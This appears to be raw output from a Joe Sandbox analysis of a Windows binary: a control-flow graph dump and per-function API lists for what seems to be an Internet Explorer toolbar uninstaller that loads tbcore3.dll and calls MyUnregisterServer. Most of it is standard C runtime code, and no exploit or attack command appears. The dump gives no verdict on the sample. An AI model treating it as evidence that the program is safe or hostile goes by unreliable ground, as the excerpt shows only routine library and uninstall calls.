3225->3226 3319 1f1000 CoInitialize CreateMutexW 3226->3319 3228 1f1216 3229 1f1224 3228->3229 3333 1f1681 3228->3333 3351 1f16ad 3229->3351 3232 1f1229 __mtinitlocknum 3233->3198 3235 1f1177 3234->3235 3235->3202 3336 1f10db 3235->3336 3237 1f24a9 3236->3237 3238 1f24a2 3236->3238 3240 1f24b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3237->3240 3241 1f2611 3237->3241 3354 1f13e1 3238->3354 3247 1f24fc TlsAlloc 3240->3247 3413 1f21a8 3241->3413 3245 1f254a TlsSetValue 3246 1f1189 3245->3246 3248 1f255b 3245->3248 3246->3206 3246->3207 3247->3245 3247->3246 3358 1f16cb 3248->3358 3253 1f207e __encode_pointer 6 API calls 3254 1f257b 3253->3254 3255 1f207e __encode_pointer 6 API calls 3254->3255 3256 1f258b 3255->3256 3257 1f207e __encode_pointer 6 API calls 3256->3257 3258 1f259b 3257->3258 3375 1f2924 3258->3375 3265 1f20f9 __decode_pointer 6 API calls 3266 1f25ef 3265->3266 3266->3241 3267 1f25f6 3266->3267 3395 1f21e5 3267->3395 3269 1f25fe GetCurrentThreadId 3269->3246 3740 1f264c 3270->3740 3272 1f1dea GetStartupInfoA 3273 1f3730 __calloc_crt 66 API calls 3272->3273 3280 1f1e0b 3273->3280 3274 1f2029 __mtinitlocknum 3274->3209 3275 1f1fa6 GetStdHandle 3279 1f1f70 3275->3279 3276 1f200b SetHandleCount 3276->3274 3277 1f3730 __calloc_crt 66 API calls 3277->3280 3278 1f1fb8 GetFileType 3278->3279 3279->3274 3279->3275 3279->3276 3279->3278 3283 1f317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3279->3283 3280->3274 3280->3277 3280->3279 3282 1f1ef3 3280->3282 3281 1f1f1c GetFileType 3281->3282 3282->3274 3282->3279 3282->3281 3284 1f317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3282->3284 3283->3279 3284->3282 3286 1f1d92 3285->3286 3288 1f1d96 3285->3288 3286->3214 3289 1f36eb __malloc_crt 66 API calls 3288->3289 3290 1f1db7 3289->3290 3291 1f1dbe FreeEnvironmentStringsW 3290->3291 3741 1f37f0 3290->3741 3291->3214 3295 1f1d08 _wparse_cmdline 3294->3295 3296 1f11c7 3295->3296 3297 1f1d45 3295->3297 3296->3217 3296->3218 
3298 1f36eb __malloc_crt 66 API calls 3297->3298 3299 1f1d4b _wparse_cmdline 3298->3299 3299->3296 3301 1f1abc _wcslen 3300->3301 3303 1f11d8 3300->3303 3302 1f3730 __calloc_crt 66 API calls 3301->3302 3304 1f1ae0 _wcslen 3302->3304 3303->3221 3303->3223 3304->3303 3305 1f1b45 3304->3305 3307 1f3730 __calloc_crt 66 API calls 3304->3307 3308 1f1b6b 3304->3308 3311 1f1b2a 3304->3311 3745 1f367c 3304->3745 3306 1f35ee __freea 66 API calls 3305->3306 3306->3303 3307->3304 3310 1f35ee __freea 66 API calls 3308->3310 3310->3303 3311->3304 3312 1f2ae2 __invoke_watson 10 API calls 3311->3312 3312->3311 3315 1f14de __IsNonwritableInCurrentImage 3313->3315 3754 1f2dc3 3315->3754 3316 1f14fc __initterm_e 3318 1f151b __IsNonwritableInCurrentImage __initterm 3316->3318 3758 1f2dac 3316->3758 3318->3224 3320 1f101f GetLastError 3319->3320 3321 1f1035 GetCommandLineW CommandLineToArgvW 3319->3321 3320->3321 3322 1f102c 3320->3322 3323 1f1056 PathFileExistsW 3321->3323 3325 1f1067 3321->3325 3322->3228 3324 1f106e PathFileExistsW 3323->3324 3323->3325 3324->3325 3326 1f1084 LoadLibraryW 3324->3326 3325->3326 3327 1f10aa CloseHandle CoUninitialize 3326->3327 3328 1f1091 GetProcAddress 3326->3328 3329 1f10bb LocalFree 3327->3329 3330 1f10c2 3327->3330 3331 1f10a3 FreeLibrary 3328->3331 3332 1f10a1 3328->3332 3329->3330 3330->3228 3331->3327 3332->3331 3859 1f1555 3333->3859 3335 1f1692 3335->3229 3337 1f10ee 3336->3337 3338 1f10e9 3336->3338 3340 1f1719 __NMSG_WRITE 66 API calls 3337->3340 3339 1f18c4 __FF_MSGBANNER 66 API calls 3338->3339 3339->3337 3341 1f10f6 3340->3341 3342 1f1465 _fast_error_exit 3 API calls 3341->3342 3343 1f1100 3342->3343 3343->3202 3345 1f18c4 __FF_MSGBANNER 66 API calls 3344->3345 3346 1f141b 3345->3346 3347 1f1719 __NMSG_WRITE 66 API calls 3346->3347 3348 1f1423 3347->3348 3349 1f20f9 __decode_pointer 6 API calls 3348->3349 3350 1f11ad 3349->3350 3350->3210 3352 1f1555 _doexit 66 API calls 3351->3352 3353 1f16b8 3352->3353 3353->3232 3355 1f13ec Sleep 
GetModuleHandleW 3354->3355 3356 1f140e 3355->3356 3357 1f140a 3355->3357 3356->3237 3357->3355 3357->3356 3424 1f20f0 3358->3424 3360 1f16d3 __init_pointers __initp_misc_winsig 3427 1f2913 3360->3427 3363 1f207e __encode_pointer 6 API calls 3364 1f170f 3363->3364 3365 1f207e TlsGetValue 3364->3365 3366 1f20b7 GetModuleHandleW 3365->3366 3367 1f2096 3365->3367 3369 1f20c7 3366->3369 3370 1f20d2 GetProcAddress 3366->3370 3367->3366 3368 1f20a0 TlsGetValue 3367->3368 3373 1f20ab 3368->3373 3372 1f13e1 __crt_waiting_on_module_handle 2 API calls 3369->3372 3371 1f20af 3370->3371 3371->3253 3374 1f20cd 3372->3374 3373->3366 3373->3371 3374->3370 3374->3371 3376 1f292f 3375->3376 3378 1f25a8 3376->3378 3430 1f317c 3376->3430 3378->3241 3379 1f20f9 TlsGetValue 3378->3379 3380 1f2132 GetModuleHandleW 3379->3380 3381 1f2111 3379->3381 3383 1f214d GetProcAddress 3380->3383 3384 1f2142 3380->3384 3381->3380 3382 1f211b TlsGetValue 3381->3382 3387 1f2126 3382->3387 3386 1f212a 3383->3386 3385 1f13e1 __crt_waiting_on_module_handle 2 API calls 3384->3385 3388 1f2148 3385->3388 3386->3241 3389 1f3730 3386->3389 3387->3380 3387->3386 3388->3383 3388->3386 3391 1f3739 3389->3391 3392 1f25d5 3391->3392 3393 1f3757 Sleep 3391->3393 3435 1f557f 3391->3435 3392->3241 3392->3265 3394 1f376c 3393->3394 3394->3391 3394->3392 3719 1f264c 3395->3719 3397 1f21f1 GetModuleHandleW 3398 1f2201 3397->3398 3402 1f2207 3397->3402 3399 1f13e1 __crt_waiting_on_module_handle 2 API calls 3398->3399 3399->3402 3400 1f221f GetProcAddress GetProcAddress 3401 1f2243 3400->3401 3403 1f2aa0 __lock 62 API calls 3401->3403 3402->3400 3402->3401 3404 1f2262 InterlockedIncrement 3403->3404 3720 1f22ba 3404->3720 3407 1f2aa0 __lock 62 API calls 3408 1f2283 3407->3408 3723 1f3c9e InterlockedIncrement 3408->3723 3410 1f22a1 3735 1f22c3 3410->3735 3412 1f22ae __mtinitlocknum 3412->3269 3414 1f21be 3413->3414 3415 1f21b2 3413->3415 3417 1f21d2 TlsFree 3414->3417 3418 1f21e0 3414->3418 3416 1f20f9 __decode_pointer 6 
API calls 3415->3416 3416->3414 3417->3418 3419 1f298b DeleteCriticalSection 3418->3419 3420 1f29a3 3418->3420 3421 1f35ee __freea 66 API calls 3419->3421 3422 1f29b5 DeleteCriticalSection 3420->3422 3423 1f29c3 3420->3423 3421->3418 3422->3420 3423->3246 3425 1f207e __encode_pointer 6 API calls 3424->3425 3426 1f20f7 3425->3426 3426->3360 3428 1f207e __encode_pointer 6 API calls 3427->3428 3429 1f1705 3428->3429 3429->3363 3434 1f264c 3430->3434 3432 1f3188 InitializeCriticalSectionAndSpinCount 3433 1f31cc __mtinitlocknum 3432->3433 3433->3376 3434->3432 3436 1f558b __mtinitlocknum 3435->3436 3437 1f55a3 3436->3437 3442 1f55c2 __crtLCMapStringA_stat 3436->3442 3448 1f2c72 3437->3448 3441 1f5634 HeapAlloc 3441->3442 3442->3441 3445 1f55b8 __mtinitlocknum 3442->3445 3454 1f2aa0 3442->3454 3461 1f4dc3 3442->3461 3467 1f567b 3442->3467 3470 1f31eb 3442->3470 3445->3391 3473 1f22cc GetLastError 3448->3473 3450 1f2c77 3451 1f2c0a 3450->3451 3452 1f20f9 __decode_pointer 6 API calls 3451->3452 3453 1f2c1a __invoke_watson 3452->3453 3455 1f2ac8 EnterCriticalSection 3454->3455 3456 1f2ab5 3454->3456 3455->3442 3515 1f29dd 3456->3515 3458 1f2abb 3458->3455 3459 1f1411 __amsg_exit 65 API calls 3458->3459 3460 1f2ac7 3459->3460 3460->3455 3462 1f4df1 3461->3462 3463 1f4e93 3462->3463 3464 1f4e8a 3462->3464 3707 1f492a 3462->3707 3463->3442 3464->3463 3714 1f49da 3464->3714 3718 1f29c6 LeaveCriticalSection 3467->3718 3469 1f5682 3469->3442 3471 1f20f9 __decode_pointer 6 API calls 3470->3471 3472 1f31fb 3471->3472 3472->3442 3487 1f2174 TlsGetValue 3473->3487 3476 1f2339 SetLastError 3476->3450 3477 1f3730 __calloc_crt 63 API calls 3478 1f22f7 3477->3478 3478->3476 3479 1f20f9 __decode_pointer 6 API calls 3478->3479 3480 1f2311 3479->3480 3481 1f2318 3480->3481 3482 1f2330 3480->3482 3483 1f21e5 __mtinit 63 API calls 3481->3483 3492 1f35ee 3482->3492 3485 1f2320 GetCurrentThreadId 3483->3485 3485->3476 3486 1f2336 3486->3476 3488 1f2189 3487->3488 3489 1f21a4 3487->3489 3490 
1f20f9 __decode_pointer 6 API calls 3488->3490 3489->3476 3489->3477 3491 1f2194 TlsSetValue 3490->3491 3491->3489 3495 1f35fa __mtinitlocknum 3492->3495 3493 1f3673 _realloc __mtinitlocknum 3493->3486 3494 1f3639 3494->3493 3496 1f364e HeapFree 3494->3496 3495->3493 3495->3494 3497 1f2aa0 __lock 64 API calls 3495->3497 3496->3493 3498 1f3660 3496->3498 3500 1f3611 ___sbh_find_block 3497->3500 3499 1f2c72 _strcat_s 64 API calls 3498->3499 3501 1f3665 GetLastError 3499->3501 3502 1f362b 3500->3502 3505 1f4614 3500->3505 3501->3493 3511 1f3644 3502->3511 3506 1f4653 3505->3506 3510 1f48f5 ___sbh_free_block 3505->3510 3507 1f483f VirtualFree 3506->3507 3506->3510 3508 1f48a3 3507->3508 3509 1f48b2 VirtualFree HeapFree 3508->3509 3508->3510 3509->3510 3510->3502 3514 1f29c6 LeaveCriticalSection 3511->3514 3513 1f364b 3513->3494 3514->3513 3516 1f29e9 __mtinitlocknum 3515->3516 3530 1f2a0f 3516->3530 3541 1f18c4 3516->3541 3518 1f2a1f __mtinitlocknum 3518->3458 3523 1f2a31 3526 1f2c72 _strcat_s 66 API calls 3523->3526 3524 1f2a40 3527 1f2aa0 __lock 66 API calls 3524->3527 3526->3518 3529 1f2a47 3527->3529 3531 1f2a4f 3529->3531 3532 1f2a7b 3529->3532 3530->3518 3587 1f36eb 3530->3587 3534 1f317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3531->3534 3533 1f35ee __freea 66 API calls 3532->3533 3535 1f2a6c 3533->3535 3536 1f2a5a 3534->3536 3592 1f2a97 3535->3592 3536->3535 3538 1f35ee __freea 66 API calls 3536->3538 3539 1f2a66 3538->3539 3540 1f2c72 _strcat_s 66 API calls 3539->3540 3540->3535 3595 1f35a3 3541->3595 3544 1f35a3 __set_error_mode 66 API calls 3546 1f18d8 3544->3546 3545 1f1719 __NMSG_WRITE 66 API calls 3547 1f18f0 3545->3547 3546->3545 3548 1f18fa 3546->3548 3549 1f1719 __NMSG_WRITE 66 API calls 3547->3549 3550 1f1719 3548->3550 3549->3548 3551 1f172d 3550->3551 3552 1f35a3 __set_error_mode 63 API calls 3551->3552 3583 1f1888 3551->3583 3553 1f174f 3552->3553 3554 1f188d GetStdHandle 3553->3554 3556 1f35a3 __set_error_mode 63 API calls 3553->3556 
3555 1f189b _strlen 3554->3555 3554->3583 3559 1f18b4 WriteFile 3555->3559 3555->3583 3557 1f1760 3556->3557 3557->3554 3558 1f1772 3557->3558 3558->3583 3601 1f353b 3558->3601 3559->3583 3562 1f17a8 GetModuleFileNameA 3564 1f17c6 3562->3564 3568 1f17e9 _strlen 3562->3568 3566 1f353b _strcpy_s 63 API calls 3564->3566 3567 1f17d6 3566->3567 3567->3568 3569 1f2ae2 __invoke_watson 10 API calls 3567->3569 3580 1f182c 3568->3580 3617 1f33f0 3568->3617 3569->3568 3573 1f1850 3574 1f337c _strcat_s 63 API calls 3573->3574 3577 1f1864 3574->3577 3576 1f2ae2 __invoke_watson 10 API calls 3576->3573 3579 1f1875 3577->3579 3581 1f2ae2 __invoke_watson 10 API calls 3577->3581 3578 1f2ae2 __invoke_watson 10 API calls 3578->3580 3635 1f3213 3579->3635 3626 1f337c 3580->3626 3581->3579 3584 1f1465 3583->3584 3673 1f143a GetModuleHandleW 3584->3673 3591 1f36f4 3587->3591 3589 1f2a2a 3589->3523 3589->3524 3590 1f370b Sleep 3590->3591 3591->3589 3591->3590 3677 1f54b5 3591->3677 3706 1f29c6 LeaveCriticalSection 3592->3706 3594 1f2a9e 3594->3518 3596 1f35b2 3595->3596 3597 1f18cb 3596->3597 3598 1f2c72 _strcat_s 66 API calls 3596->3598 3597->3544 3597->3546 3599 1f35d5 3598->3599 3600 1f2c0a _strcat_s 6 API calls 3599->3600 3600->3597 3602 1f354c 3601->3602 3604 1f3553 3601->3604 3602->3604 3608 1f3579 3602->3608 3603 1f2c72 _strcat_s 66 API calls 3605 1f3558 3603->3605 3604->3603 3606 1f2c0a _strcat_s 6 API calls 3605->3606 3607 1f1794 3606->3607 3607->3562 3610 1f2ae2 3607->3610 3608->3607 3609 1f2c72 _strcat_s 66 API calls 3608->3609 3609->3605 3662 1f5320 3610->3662 3612 1f2b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3613 1f2beb GetCurrentProcess TerminateProcess 3612->3613 3616 1f2bdf __invoke_watson 3612->3616 3664 1f10cc 3613->3664 3615 1f17a5 3615->3562 3616->3613 3622 1f3402 3617->3622 3618 1f3406 3619 1f1819 3618->3619 3620 1f2c72 _strcat_s 66 API calls 3618->3620 3619->3578 3619->3580 3621 1f3422 3620->3621 3623 1f2c0a _strcat_s 6 API calls 
3621->3623 3622->3618 3622->3619 3624 1f344c 3622->3624 3623->3619 3624->3619 3625 1f2c72 _strcat_s 66 API calls 3624->3625 3625->3621 3627 1f338d 3626->3627 3628 1f3394 3626->3628 3627->3628 3631 1f33c8 3627->3631 3629 1f2c72 _strcat_s 66 API calls 3628->3629 3634 1f3399 3629->3634 3630 1f2c0a _strcat_s 6 API calls 3632 1f183f 3630->3632 3631->3632 3633 1f2c72 _strcat_s 66 API calls 3631->3633 3632->3573 3632->3576 3633->3634 3634->3630 3636 1f20f0 __init_pointers 6 API calls 3635->3636 3637 1f3223 3636->3637 3638 1f3236 LoadLibraryA 3637->3638 3639 1f32be 3637->3639 3640 1f324b GetProcAddress 3638->3640 3641 1f3360 3638->3641 3646 1f20f9 __decode_pointer 6 API calls 3639->3646 3659 1f32e8 3639->3659 3640->3641 3643 1f3261 3640->3643 3641->3583 3642 1f3313 3644 1f20f9 __decode_pointer 6 API calls 3642->3644 3647 1f207e __encode_pointer 6 API calls 3643->3647 3644->3641 3645 1f20f9 __decode_pointer 6 API calls 3655 1f332b 3645->3655 3648 1f32db 3646->3648 3649 1f3267 GetProcAddress 3647->3649 3650 1f20f9 __decode_pointer 6 API calls 3648->3650 3651 1f207e __encode_pointer 6 API calls 3649->3651 3650->3659 3652 1f327c GetProcAddress 3651->3652 3653 1f207e __encode_pointer 6 API calls 3652->3653 3654 1f3291 GetProcAddress 3653->3654 3656 1f207e __encode_pointer 6 API calls 3654->3656 3655->3642 3658 1f20f9 __decode_pointer 6 API calls 3655->3658 3657 1f32a6 3656->3657 3657->3639 3660 1f32b0 GetProcAddress 3657->3660 3658->3642 3659->3642 3659->3645 3661 1f207e __encode_pointer 6 API calls 3660->3661 3661->3639 3663 1f532c __VEC_memzero 3662->3663 3663->3612 3665 1f10d6 IsDebuggerPresent 3664->3665 3666 1f10d4 3664->3666 3672 1f28d2 3665->3672 3666->3615 3669 1f1358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3670 1f137d GetCurrentProcess TerminateProcess 3669->3670 3671 1f1375 __invoke_watson 3669->3671 3670->3615 3671->3670 3672->3669 3674 1f144e GetProcAddress 3673->3674 3675 1f1463 ExitProcess 3673->3675 3674->3675 3676 1f145e 3674->3676 3676->3675 3678 
1f5568 3677->3678 3687 1f54c7 3677->3687 3679 1f31eb _malloc 6 API calls 3678->3679 3680 1f556e 3679->3680 3682 1f2c72 _strcat_s 65 API calls 3680->3682 3681 1f18c4 __FF_MSGBANNER 65 API calls 3681->3687 3693 1f5560 3682->3693 3684 1f1719 __NMSG_WRITE 65 API calls 3684->3687 3685 1f5524 HeapAlloc 3685->3687 3686 1f1465 _fast_error_exit 3 API calls 3686->3687 3687->3681 3687->3684 3687->3685 3687->3686 3688 1f5554 3687->3688 3689 1f31eb _malloc 6 API calls 3687->3689 3691 1f5559 3687->3691 3687->3693 3694 1f5466 3687->3694 3690 1f2c72 _strcat_s 65 API calls 3688->3690 3689->3687 3690->3691 3692 1f2c72 _strcat_s 65 API calls 3691->3692 3692->3693 3693->3591 3696 1f5472 __mtinitlocknum 3694->3696 3695 1f54a3 __mtinitlocknum 3695->3687 3696->3695 3697 1f2aa0 __lock 66 API calls 3696->3697 3698 1f5488 3697->3698 3699 1f4dc3 ___sbh_alloc_block 5 API calls 3698->3699 3700 1f5493 3699->3700 3702 1f54ac 3700->3702 3705 1f29c6 LeaveCriticalSection 3702->3705 3704 1f54b3 3704->3695 3705->3704 3706->3594 3708 1f493d HeapReAlloc 3707->3708 3709 1f4971 HeapAlloc 3707->3709 3710 1f495f 3708->3710 3711 1f495b 3708->3711 3709->3711 3712 1f4994 VirtualAlloc 3709->3712 3710->3709 3711->3464 3712->3711 3713 1f49ae HeapFree 3712->3713 3713->3711 3715 1f49f1 VirtualAlloc 3714->3715 3717 1f4a38 3715->3717 3717->3463 3718->3469 3719->3397 3738 1f29c6 LeaveCriticalSection 3720->3738 3722 1f227c 3722->3407 3724 1f3cbf 3723->3724 3725 1f3cbc InterlockedIncrement 3723->3725 3726 1f3ccc 3724->3726 3727 1f3cc9 InterlockedIncrement 3724->3727 3725->3724 3728 1f3cd9 3726->3728 3729 1f3cd6 InterlockedIncrement 3726->3729 3727->3726 3730 1f3ce3 InterlockedIncrement 3728->3730 3731 1f3ce6 3728->3731 3729->3728 3730->3731 3732 1f3cff InterlockedIncrement 3731->3732 3733 1f3d0f InterlockedIncrement 3731->3733 3734 1f3d1a InterlockedIncrement 3731->3734 3732->3731 3733->3731 3734->3410 3739 1f29c6 LeaveCriticalSection 3735->3739 3737 1f22ca 3737->3412 3738->3722 3739->3737 3740->3272 3742 1f3808 
3741->3742 3743 1f1dd3 3742->3743 3744 1f382f __VEC_memcpy 3742->3744 3743->3291 3744->3743 3746 1f368d 3745->3746 3747 1f3694 3745->3747 3746->3747 3752 1f36c0 3746->3752 3748 1f2c72 _strcat_s 66 API calls 3747->3748 3749 1f3699 3748->3749 3750 1f2c0a _strcat_s 6 API calls 3749->3750 3751 1f36a8 3750->3751 3751->3304 3752->3751 3753 1f2c72 _strcat_s 66 API calls 3752->3753 3753->3749 3755 1f2dc9 3754->3755 3756 1f207e __encode_pointer 6 API calls 3755->3756 3757 1f2de1 3755->3757 3756->3755 3757->3316 3761 1f2d70 3758->3761 3760 1f2db9 3760->3318 3762 1f2d7c __mtinitlocknum 3761->3762 3769 1f147d 3762->3769 3768 1f2d9d __mtinitlocknum 3768->3760 3770 1f2aa0 __lock 66 API calls 3769->3770 3771 1f1484 3770->3771 3772 1f2c85 3771->3772 3773 1f20f9 __decode_pointer 6 API calls 3772->3773 3774 1f2c99 3773->3774 3775 1f20f9 __decode_pointer 6 API calls 3774->3775 3776 1f2ca9 3775->3776 3777 1f2d2c 3776->3777 3792 1f539a 3776->3792 3789 1f2da6 3777->3789 3779 1f2d13 3780 1f207e __encode_pointer 6 API calls 3779->3780 3783 1f2d21 3780->3783 3781 1f2cc7 3781->3779 3782 1f2ceb 3781->3782 3805 1f377c 3781->3805 3782->3777 3786 1f377c __realloc_crt 73 API calls 3782->3786 3787 1f2d01 3782->3787 3785 1f207e __encode_pointer 6 API calls 3783->3785 3785->3777 3786->3787 3787->3777 3788 1f207e __encode_pointer 6 API calls 3787->3788 3788->3779 3855 1f1486 3789->3855 3793 1f53a6 __mtinitlocknum 3792->3793 3794 1f53b6 3793->3794 3795 1f53d3 3793->3795 3796 1f2c72 _strcat_s 66 API calls 3794->3796 3797 1f5414 HeapSize 3795->3797 3799 1f2aa0 __lock 66 API calls 3795->3799 3798 1f53bb 3796->3798 3801 1f53cb __mtinitlocknum 3797->3801 3800 1f2c0a _strcat_s 6 API calls 3798->3800 3802 1f53e3 ___sbh_find_block 3799->3802 3800->3801 3801->3781 3810 1f5434 3802->3810 3806 1f3785 3805->3806 3808 1f37c4 3806->3808 3809 1f37a5 Sleep 3806->3809 3814 1f569d 3806->3814 3808->3782 3809->3806 3813 1f29c6 LeaveCriticalSection 3810->3813 3812 1f540f 3812->3797 3812->3801 3813->3812 3815 1f56a9 

                                                Control-flow Graph

                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 001F1006
                                                • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 001F1013
                                                • GetLastError.KERNEL32 ref: 001F101F
                                                • GetCommandLineW.KERNEL32(?), ref: 001F1040
                                                • CommandLineToArgvW.SHELL32(00000000), ref: 001F1047
                                                • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 001F1061
                                                • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 001F1073
                                                • LoadLibraryW.KERNELBASE(?), ref: 001F1085
                                                • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 001F1097
                                                • FreeLibrary.KERNELBASE(00000000), ref: 001F10A4
                                                • CloseHandle.KERNELBASE(00000000), ref: 001F10AB
                                                • CoUninitialize.COMBASE ref: 001F10B1
                                                • LocalFree.KERNEL32(00000000), ref: 001F10BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmp
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmp
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                • API String ID: 474438367-4110843154

                                                Control-flow Graph

                                                control_flow_graph 16 1f1465-1f1476 call 1f143a ExitProcess
                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 001F146D
                                                  • Part of subcall function 001F143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,001F1472,?,?,001F54EE,000000FF,0000001E,?,001F36FC,?,00000001,?,?,001F2A2A,00000018), ref: 001F1444
                                                  • Part of subcall function 001F143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F1454
                                                • ExitProcess.KERNEL32 ref: 001F1476
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0

                                                Control-flow Graph

                                                control_flow_graph 19 1f261b-1f263d HeapCreate 20 1f263f-1f2640 19->20 21 1f2641-1f264a 19->21
                                                APIs
                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 001F2630
                                                Similarity
                                                • API ID: CreateHeap
                                                • String ID:
                                                • API String ID: 10892065-0

                                                Control-flow Graph

                                                control_flow_graph 22 1f1681-1f168d call 1f1555 24 1f1692-1f1696 22->24
                                                APIs
                                                • _doexit.LIBCMT ref: 001F168D
                                                  • Part of subcall function 001F1555: __lock.LIBCMT ref: 001F1563
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F159A
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15AF
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15D9
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15EF
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15FC
                                                  • Part of subcall function 001F1555: __initterm.LIBCMT ref: 001F162B
                                                  • Part of subcall function 001F1555: __initterm.LIBCMT ref: 001F163B
                                                Similarity
                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 1597249276-0

                                                Control-flow Graph

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 001F1346
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F135B
                                                • UnhandledExceptionFilter.KERNEL32(001F816C), ref: 001F1366
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 001F1382
                                                • TerminateProcess.KERNEL32(00000000), ref: 001F1389
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,001F9458,0000000C,001F2320,00000000,00000000,?,001F174F,00000003,?,?,?,?,?,?,001F10F6), ref: 001F21F7
                                                • __crt_waiting_on_module_handle.LIBCMT ref: 001F2202
                                                  • Part of subcall function 001F13E1: Sleep.KERNEL32(000003E8,00000000,?,001F2148,KERNEL32.DLL,?,001F2194,?,001F174F,00000003), ref: 001F13ED
                                                  • Part of subcall function 001F13E1: GetModuleHandleW.KERNEL32(?,?,001F2148,KERNEL32.DLL,?,001F2194,?,001F174F,00000003,?,?,?,?,?,?,001F10F6), ref: 001F13F6
                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 001F222B
                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 001F223B
                                                • __lock.LIBCMT ref: 001F225D
                                                • InterlockedIncrement.KERNEL32(001FA4D8), ref: 001F226A
                                                • __lock.LIBCMT ref: 001F227E
                                                • ___addlocaleref.LIBCMT ref: 001F229C
                                                Strings
                                                Similarity
                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                • API String ID: 1028249917-2843748187

                                                Control-flow Graph

                                                control_flow_graph 170 1f40a0-1f40bb call 1f264c call 1f2345 175 1f40bd-1f40c1 170->175 176 1f40da-1f40f2 call 1f2aa0 170->176 175->176 178 1f40c3 175->178 183 1f412a-1f4136 call 1f413b 176->183 184 1f40f4-1f40f6 176->184 179 1f40c6-1f40c8 178->179 181 1f40ca-1f40d1 call 1f1411 179->181 182 1f40d2-1f40d9 call 1f2691 179->182 181->182 183->179 188 1f40f8-1f4101 InterlockedDecrement 184->188 189 1f4112-1f4124 InterlockedIncrement 184->189 188->189 193 1f4103-1f4109 188->193 189->183 193->189 194 1f410b-1f4111 call 1f35ee 193->194 194->189
                                                APIs
                                                • __getptd.LIBCMT ref: 001F40AC
                                                  • Part of subcall function 001F2345: __getptd_noexit.LIBCMT ref: 001F2348
                                                  • Part of subcall function 001F2345: __amsg_exit.LIBCMT ref: 001F2355
                                                • __amsg_exit.LIBCMT ref: 001F40CC
                                                • __lock.LIBCMT ref: 001F40DC
                                                • InterlockedDecrement.KERNEL32(?), ref: 001F40F9
                                                • InterlockedIncrement.KERNEL32(028C2B98), ref: 001F4124
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 4271482742-0

                                                Control-flow Graph

                                                control_flow_graph 197 1f35ee-1f35ff call 1f264c 200 1f3676-1f367b call 1f2691 197->200 201 1f3601-1f3608 197->201 203 1f364d 201->203 204 1f360a-1f3622 call 1f2aa0 call 1f45e4 201->204 206 1f364e-1f365e HeapFree 203->206 214 1f362d-1f363d call 1f3644 204->214 215 1f3624-1f362c call 1f4614 204->215 206->200 208 1f3660-1f3675 call 1f2c72 GetLastError call 1f2c30 206->208 208->200 214->200 222 1f363f-1f3642 214->222 215->214 222->206
                                                APIs
                                                • __lock.LIBCMT ref: 001F360C
                                                  • Part of subcall function 001F2AA0: __mtinitlocknum.LIBCMT ref: 001F2AB6
                                                  • Part of subcall function 001F2AA0: __amsg_exit.LIBCMT ref: 001F2AC2
                                                  • Part of subcall function 001F2AA0: EnterCriticalSection.KERNEL32(?,?,?,001F5600,00000004,001F9628,0000000C,001F3746,?,?,00000000,00000000,00000000,?,001F22F7,00000001), ref: 001F2ACA
                                                • ___sbh_find_block.LIBCMT ref: 001F3617
                                                • ___sbh_free_block.LIBCMT ref: 001F3626
                                                • HeapFree.KERNEL32(00000000,?,001F9568,0000000C,001F2A81,00000000,001F94C8,0000000C,001F2ABB,?,?,?,001F5600,00000004,001F9628,0000000C), ref: 001F3656
                                                • GetLastError.KERNEL32(?,001F5600,00000004,001F9628,0000000C,001F3746,?,?,00000000,00000000,00000000,?,001F22F7,00000001,00000214), ref: 001F3667
                                                Similarity
